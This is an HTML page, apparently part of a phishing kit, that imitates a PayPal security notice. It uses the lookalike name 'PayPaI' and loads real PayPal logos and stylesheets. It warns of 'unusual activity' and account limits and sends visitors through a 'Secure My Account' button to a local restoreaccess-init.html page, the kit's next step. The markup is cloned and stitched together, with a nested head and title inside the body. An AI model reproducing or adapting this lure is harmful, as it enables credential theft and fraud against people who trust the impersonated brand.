
<!DOCTYPE html><html lang="en">
	<head>
		<title>Security Notice - PayPaI &amp; PayPaI Account</title>
		<link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" />
		<meta charset="utf-8">
		
		
		
		
		
		
		
		
		
		
		
		
		
		
		
		
		
		<meta name="robots" content="noindex">
		<link rel="stylesheet" type="text/css" href="style.css">
<div id="show_description" class="content_description padded">

		<div class="container" dir="ltr">
			<table>
				<tbody><tr class="page_header">
					<td class="col_size">
						<div class="icon_logo"></div>
					</td>
					<td class="col_center"></td>
					<td class="col_help" id="show_help">
						
					</td>
				</tr>
			</table>
			<div class="envelope"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><link rel="stylesheet" href="https://www.paypalobjects.com/web/res/3c1/50907de64ded305fb139f75c4716e/css/app.css"><title>PayPal Inc.</title></head><body class=""><div><style nonce="FpbNM2StknmQjwUkUjad37LP5psj2Cdq5EVibqMB73G57kZF">html { display:block }</style><div><div><div class="jsDisabled"><noscript><meta http-equiv="refresh" content="0; url='/signin'" /><style nonce="FpbNM2StknmQjwUkUjad37LP5psj2Cdq5EVibqMB73G57kZF">html {display: none}</style></noscript></div><div class="contentContainer" id="content"><div><div class="safeComponent" data-nemo="safeStartPage"><header><div class="paypal-logo"></div></header><div class="safe"><h1>We noticed some unusual activity</h1><div class="safeDescription"><p class="description">We need your help securing your account to prevent unauthorized access. For your safety, there may be some limitations on your account until you take action.</p><div class="buttons requirejs-wait"><a class="btn btn-primary button" href="./restoreaccess-init.html">Secure My Account</a></div></div></div><div class="loaderOverlay"><div class="modal-animate hide"><div class="rotate"></div><div class="processing">Processing...</div></div><div class="modal-overlay hide"></div></div></div></div></div></div></div><footer class="footer"><ul class="footerLinks"><li class="privacyFooterListItem"><a href="/sg/webapps/mpp/ua/privacy-full">Privacy</a></li><li class="legalFooterListItem"><a href="/sg/webapps/mpp/ua/legalhub-full">Legal</a></li></ul></footer>